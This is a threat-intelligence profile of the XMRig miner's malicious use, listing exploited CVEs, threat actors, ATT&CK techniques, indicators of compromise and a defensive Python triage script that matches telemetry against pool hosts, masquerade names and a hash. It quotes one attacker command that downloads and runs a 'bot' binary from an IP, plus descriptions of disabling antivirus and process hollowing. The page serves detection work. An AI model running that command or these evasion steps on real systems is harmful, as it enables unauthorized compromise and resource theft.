XMRig
XMRig is a high-performance, open-source, cross-platform cryptocurrency miner, most commonly used to mine Monero and frequently repurposed by threat actors as a cryptomining payload. The cited reporting describes it as supporting RandomX, KawPow, CryptoNight, and GhostRider CPU/GPU mining, and identifies the observed malicious deployments as XMRig-based Monero miners, including versions 5.5.3, 6.18, and 6.24.0.
Across the cited incidents, XMRig was deployed on both Windows and Linux systems, including servers, containers, developer workstations, and compromised enterprise endpoints. Delivery vectors mentioned in the cited reporting include malicious VS Code extensions, PowerShell installers, staged malware chains, exploitation of internet-facing vulnerabilities such as VMware Workspace ONE Access/Identity Manager CVE-2022-22954, React2Shell/CVE-2025-55182, and DreamBus exploitation of Metabase CVE-2023-38646 and Apache RocketMQ CVE-2023-33246. It was also delivered through broader malware ecosystems and botnets including Prometei, Blackmoon/KRBanker, DDG.Mining.Botnet, and V3G4, and through campaigns abusing compromised software distribution pipelines.
Observed behavior in the cited reporting includes disabling or evading security controls, such as adding Windows Defender exclusions and disabling Windows Defender, Malwarebytes, and Sophos; persistence via Windows services, cron, systemd services, and autostart mechanisms; process killing to remove competing miners; and stealth measures such as renaming the miner to benign-looking filenames including nginx and WmiPrvSER.exe. Some campaigns used modified XMRig payloads, runtime-delivered configuration, or XMRig-based miners implemented in Go. Reported strings and artifacts include "killed orphan miner pid %d", "user active, stopping miner", "m/cmd/xmrig-idle", the mutex BaseNamedObjects\Win__Host, mining-pool-related connectivity such as us[.]zephyr[.]herominers[.]com, xmrig[.]com, pool.hashvault[.]pro:443, and www.chatgptaiweb[.]top:80, and a sample hash for an XMRig binary renamed as nginx with MD5 859fbbedefc95a90d243a0a9b92d1ae9.
The cited reporting associates XMRig deployment with multiple threat actors and clusters, including GREYVIBE, TeamPCP, and operators of DreamBus, Prometei, Blackmoon, DDG.Mining.Botnet, and React2Shell exploitation campaigns. Targeting described in the source material spans Ukraine-related military, government, civilian, and business entities; businesses in the United States and Canada; Russian insurance, e-commerce, and IT organizations; Linux servers and IoT devices; and victims of malicious developer tooling and supply-chain compromises. In several cases, XMRig was not the sole objective but part of post-compromise monetization alongside credential theft, lateral movement, botnet deployment, proxy infrastructure, or remote access tooling.
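A triage routine that checks process and connection telemetry for the indicators summarised above (the quoted pool hostnames, the nginx and WmiPrvSER.exe masquerade names, and the reported MD5 of the renamed binary). This is an added example, not code from this page's sources or from the XMRig project; the record format, host names, ports and sample telemetry are constructed, and the miner command-line options checked are XMRig's own documented CLI flags.

```python
"""Flag hosts whose telemetry matches the XMRig indicators reported on this page."""
import re
from dataclasses import dataclass, field

# Pool / distribution hostnames quoted on this page, with defanging removed.
POOL_HOSTS = {"us.zephyr.herominers.com", "xmrig.com",
              "pool.hashvault.pro", "www.chatgptaiweb.top"}
# Benign-looking filenames the miner was observed hiding behind.
MASQUERADE_NAMES = {"nginx", "wmiprvser.exe"}
# MD5 reported for the XMRig binary renamed to nginx.
KNOWN_MD5 = {"859fbbedefc95a90d243a0a9b92d1ae9"}
# XMRig CLI options (-o/--url pool, -a/--algo, --coin, --donate-level);
# a process that calls itself nginx should never carry these.
MINER_ARGS = re.compile(r"(?:^|\s)(?:-o|--url|-a|--algo|--coin|--donate-level)\b")


@dataclass
class Finding:
    host: str
    reasons: list = field(default_factory=list)


def triage(records):
    """records: dicts with 'host', 'type' ('proc' or 'conn') and per-type fields.
    Returns {host: Finding} for every host with at least one indicator hit."""
    findings = {}

    def add(host, reason):
        findings.setdefault(host, Finding(host)).reasons.append(reason)

    for r in records:
        host = r["host"]
        if r["type"] == "proc":
            # Basename for both POSIX and Windows image paths.
            name = r["image"].rsplit("/", 1)[-1].rsplit("\\", 1)[-1].lower()
            cmd = r.get("cmdline", "")
            if r.get("md5", "").lower() in KNOWN_MD5:
                add(host, f"known XMRig hash on {r['image']}")
            if name in MASQUERADE_NAMES and MINER_ARGS.search(cmd):
                add(host, f"masqueraded miner: {name} launched with miner arguments")
            if "xmrig" in name or "xmrig" in cmd.lower():
                add(host, f"xmrig-named process: {r['image']}")
        elif r["type"] == "conn":
            dst = r["dst_host"].lower()
            if dst in POOL_HOSTS:
                add(host, f"connection to mining pool {dst}:{r['dst_port']}")
    return findings


# Constructed sample telemetry: one renamed miner, one pool beacon, two benign processes.
SAMPLE_RECORDS = [
    {"host": "web-01", "type": "proc", "image": "/tmp/nginx",
     "cmdline": "/tmp/nginx -o pool.hashvault.pro:443 -u WALLET_PLACEHOLDER -k --tls",
     "md5": "859fbbedefc95a90d243a0a9b92d1ae9"},
    {"host": "web-01", "type": "conn", "dst_host": "pool.hashvault.pro", "dst_port": 443},
    {"host": "dev-07", "type": "conn", "dst_host": "us.zephyr.herominers.com", "dst_port": 443},
    {"host": "dev-07", "type": "proc", "image": "C:\\Windows\\System32\\WmiPrvSE.exe",
     "cmdline": "C:\\Windows\\System32\\WmiPrvSE.exe -Embedding", "md5": "0" * 32},
    {"host": "ws-12", "type": "proc", "image": "/usr/sbin/nginx",
     "cmdline": "nginx: master process /usr/sbin/nginx -g daemon off;", "md5": "1" * 32},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_RECORDS).values():
        print(f.host, "->", "; ".join(f.reasons))
```

The legitimate nginx master process and the real WmiPrvSE.exe are not flagged: a masquerade name alone is not an indicator, only its combination with miner arguments, a known hash, or pool connectivity.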
Vulnerabilities exploited
22 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
AhnLab Security Emergency response Center (ASEC) has recently confirmed that the 8220 Gang attack group is using the Log4Shell vulnerability to install CoinMiner in VMware Horizon servers. Log4Shell (CVE-2021-44228) is both a remote code execution vulnerability and the Java-based logging utility Log4j vulnerability... | If the CVE-2022-26134 vulnerability attack succeeds, the following PowerShell command downloads and executes additional PowerShell scripts and ultimately installs XMRig CoinMiner.
The group targets not only global systems but also Korean ones. ASEC has introduced a case where the attack group abused the Atlassian Confluence server vulnerability CVE-2022-26134 to attack Korean systems and install CoinMiner. | If the CVE-2022-26134 vulnerability attack succeeds, the following PowerShell command downloads and executes additional PowerShell scripts and ultimately installs XMRig CoinMiner.
React2Shell in Russia: ... Most of the attacks deployed XMRig-based cryptominers.
In this cluster of activity, since at least March 25, 2026, an XMRig sample and its accompanying configuration file were downloaded and deployed via a shell script.
Several devices initiated TCP connections to endpoints affiliated with cryptomining pools such as us[.]zephyr[.]herominers[.]com and xmrig[.]com. Connectivity to these domains indicates likely successful installation of mining software during earlier stages of post-compromise activity.
CVE-2022-22954, a remote code execution (RCE) vulnerability due to server-side template injection in VMware Workspace ONE Access and Identity Manager, is trivial to exploit with a single HTTP request to a vulnerable device.
Apache RocketMQ Exploit Module (CVE-2023-33246) ... In June 2023, a vulnerability cataloged as CVE-2023-33246 was discovered that enables an attacker to achieve remote command execution (RCE) on RocketMQ versions 5.1.0 and earlier. Shortly after, DreamBus added an exploit module to target this vulnerability.
Metabase Exploit Module (CVE-2023-38646) ... The open source versions of Metabase 0.46.6.1 and earlier, as well as Metabase Enterprise 1.46.6.1 and earlier, are vulnerable to CVE-2023-38646 ... The vulnerability allows an attacker to execute arbitrary commands on the server. The DreamBus exploit targeting the vulnerability is likely based on an open source proof-of-concept.
The attack, at its core, exploits a critical missing authentication bug (CVE-2023-48022, CVSS score: 9.8) to take control of susceptible instances and hijack their computing power for illicit cryptocurrency mining using XMRig.
CVE-2026-20182 carries a CVSSv3.1 score of 10.0 (Critical) and is classified under CWE-287: Improper Authentication. The flaw affects the Cisco Catalyst SD-WAN Controller (formerly vSmart)... The peering authentication mechanism is not functioning correctly, allowing an unauthenticated, remote attacker to bypass authentication and obtain administrative privileges on the affected system.
Apr 2024 PAN-OS CVE-2024-3400 exploit integration (Akamai)
Analysis of react.py This script is clearly set to exploit CVE-2025-29927, also known as React2Shell. ... This script implements a fully automated React/Next.js exploitation pipeline centered on abusing CVE-2025-29927 to achieve remote command execution at scale.
Malware campaigns include the Muhstik botnet and XMRig Monero Cryptocurrency mining. | Drupal versions before 7.58... allow remote attackers to execute arbitrary code... Malware campaigns include the Muhstik botnet and XMRig Monero Cryptocurrency mining.
The PoC repository contained a PDF file... downloading and running three files: Xsession.sh → The main malware script; xsession.auth → A disguised Monero miner (XMRig); xprintidle → A utility to detect when the system was idle. | Late at night, I was testing a proof-of-concept (PoC) exploit for CVE-2020-35489 ... The script appears to be a simple Proof-of-Concept (PoC) for an exploit, but in reality, it contains hidden malicious functionality.
“CoinMiner XMRig, a CoinMiner that mines the Monero cryptocurrency, was the one the most used in the attacks.”
"x522, which kills competing miners such as XMRig and Kinsing, and launches the miner with a c3pool.org configuration"
The Kaswara Modern WPBakery Page Builder plugin (CVE-2021-24284) is an example of this. This is a five-year-old unpatched flaw in a long-abandoned plugin that attackers are still actively exploiting right now... This flaw allows an unauthenticated attacker to upload malicious code directly to a vulnerable server and execute it remotely. | "...attackers have been using this vulnerability to take over WordPress websites... to ultimately install unauthorized copies of the XMRig cryptomining software"
The vulnerability, assigned the CVE identifier CVE-2024-4577, refers to an argument injection vulnerability in PHP affecting Windows-based systems running in CGI mode that could allow remote attackers to run arbitrary code.
The vulnerability in question is CVE-2025-32432 ... in Craft CMS
Groups observed using it
20 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
One of the campaigns deployed an XMRig cryptocurrency miner on a small number of infected machines, which is not standard behavior for a disciplined intelligence operation.
Impact: T1496 Resource Hijacking. TeamPCP kills competing XMRig cryptominers before deploying its own payloads.
If the CVE-2022-26134 vulnerability attack succeeds, the following PowerShell command downloads and executes additional PowerShell scripts and ultimately installs XMRig CoinMiner.
Cryptominer Deployment: The platform deploys a custom cryptomining agent to compromised hosts... Architecture: Agent Binary: multimmm-user (custom Go binary); Miner: XMRig (Monero).
In one case, investigators detected the use of XMRig, a legitimate cryptocurrency mining tool, suggesting attackers may have used victims’ computing resources to generate digital currency.
XMRig is an open-source Monero mining application frequently abused by cybercriminals. TeamPCP deploys XMRig on compromised hosts to mine Monero using the victim’s CPU resources without authorization.
CRYSTALRAY has two associated cryptominers... (IoCs include xmrig_arm64 and xmrig_freebsd binaries).
DreamBus botnet was observed leveraging an CVE-2023-33246 exploit to drop XMRig Monero miners on vulnerable servers.
Blue Mockingbird has executed custom-compiled XMRIG miner DLLs by configuring them to execute via the "wercplsupport" service.
It uses XMRig to mine for Monero and makes sure that it uses only 60% of the processing power to evade immediate detection.
“CoinMiner XMRig, a CoinMiner that mines the Monero cryptocurrency, was the one the most used in the attacks.”
"TsunamiHardener... sets up... Microsoft Defender exclusions for TsunamiClient and the XMRig miner"
The code references XMRig, an open-source tool commonly used to mine Monero (XMR), and several Rusich-linked addresses have received funds from mining pools.
Techniques & procedures
24 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
1 technique
The content repeatedly states that threat actors 'obtained,' 'acquired,' or 'used' publicly available, open-source, legitimate, or modified tools such as Mimikatz, Cobalt Strike, PsExec, Empire, Impacket, and many others.
Initial Access
1 technique
The user was shown a message saying that the plugin version was outdated and that an update had to be installed to continue viewing. After following the link, a ZIP archive was downloaded onto the device.
Execution
7 techniques
The downloaded PowerShell scripts contain the functionality to disable Windows Defender, Malwarebytes and Sophos anti-malware software, to install modified XMRig cryptocurrency payload and download modules with the intention to steal user credentials from memory and use the credentials to attempt to spread laterally by passing the hash (Invoke-TheHash) through SMB or WMI.
The script also establishes persistence by creating... a Cron task... If executed without root privileges... adds it to both crontab (via @reboot) and .bashrc... EtherRAT establishes persistence through... crontab.
Overall, attackers can use LoLBins to: Download and install malicious code Executing malicious code... These campaigns can be relatively easily detected by internal hunting teams by analyzing command lines and their options.
Immediately after initial access, the attackers attempted to execute a PowerShell command to download a text file from a C2 server. The text file itself is a PowerShell script designed to install the XMRig cryptominer on the targeted system.
After compromising a host via the React2Shell vulnerability, threat actors executed the following commands inside a container: /bin/sh -c 'cd /tmp; wget hxxp://176.117.107[.]154/bot; chmod 777 bot; ./bot...'
CVE-2022-22954, a remote code execution (RCE) vulnerability due to server-side template injection in VMware Workspace ONE Access and Identity Manager, is trivial to exploit with a single HTTP request to a vulnerable device.
The current version of the downloaded malware is a ZIP archive containing a legitimate .exe file and a malicious DLL. When the executable is launched, the library is loaded into its process, after which execution of the malicious logic begins.
Persistence
1 technique
Privilege Escalation
4 techniques
The script also establishes persistence by creating... a Cron task... If executed without root privileges... adds it to both crontab (via @reboot) and .bashrc... EtherRAT establishes persistence through... crontab.
Finally, four reflective loads are performed: the components are injected directly into the memory of the target processes without being written to disk... RAT agent → into conhost.exe; Watchdog → into explorer.exe; CPU miner → into explorer.exe; GPU miner → into explorer.exe.
The encrypted data is then converted into a base64 string, which is passed as a command-line parameter to launch the miner inside the explorer.exe process through process hollowing.
the threat actors used a container escape technique that leverages the CGroup release_agent feature. This technique allows an attacker to break out from the container and compromise the host
Stealth
5 techniques
The Invoke-Obfuscation module is often used to create polymorphic obfuscated variants... The downloaded code is a reflective DLL loader with randomized function names to avoid simple pattern-based detection engines... This cryptocurrency miner had five deobfuscation stages.
Rather than embedding static configuration files, the malware fetches mining parameters dynamically from the C2 server at runtime... receiving a JSON blob containing wallet addresses, pool URLs, and algorithm settings without creating on-disk artifacts.
During the 2016 Ukraine Electric Power Attack, DLLs and EXEs with filenames associated with common electric power sector protocols were used to masquerade files.
Finally, four reflective loads are performed: the components are injected directly into the memory of the target processes without being written to disk... RAT agent → into conhost.exe; Watchdog → into explorer.exe; CPU miner → into explorer.exe; GPU miner → into explorer.exe.
Discovery
1 technique
To do this, it collects the following data from the victim's device: processor information; the serial number of the C:/ drive; whether the process was launched with elevated privileges; the process start time in Unix timestamp format.
Lateral Movement
2 techniques
The downloaded PowerShell scripts contain the functionality to disable Windows Defender, Malwarebytes and Sophos anti-malware software, to install modified XMRig cryptocurrency payload and download modules with the intention to steal user credentials from memory and use the credentials to attempt to spread laterally by passing the hash (Invoke-TheHash) through SMB or WMI.
Command and Control
3 techniques
The bot performs multi-threaded DNS queries against Google's public DNS server (8.8.8.8) to resolve the C2 domain baojunwakuang.asia, which maps to 159.75.47.123 and serves both botnet commands and miner configuration through non-standard ports like 60194.
Subsequently, this script leverages multiple tool layers to fetch the primary execution bundle.
The {domain} is computed from the current date... The result of the hashing is the domain with which the implant will communicate.
Impact
2 techniques
The alive.sh script... terminates any process consuming 40% CPU or more... The lived.sh script terminates... processes... identified as ELF executables... The downloaded executables... terminate all running processes except for xmrig.
This binary appears to be a crypto-miner... contains several strings relating to crypto-mining activity: “killed orphan miner pid %d” “user active, stopping miner” “m/cmd/xmrig-idle” (a Go module path indicating an XMRig-based miner)
Other
1 technique
IOCs tracked for this family
278 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
200 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A crypto-miner component indicated by an xmrig-related Go module path; the analyzed binary appears to be XMRig-based, performs a Windows Defender exclusion, copies itself as HolaMonitorService.exe, and installs an autostart service that runs when the host is idle.
A cryptocurrency miner deployed on a limited number of infected systems as part of one GREYVIBE campaign.
A cryptocurrency miner deployed on a small subset of LegionRelay-infected systems, indicating overlap with cybercriminal monetization activity.
A miner payload deployed on a small number of LegionRelay-infected systems.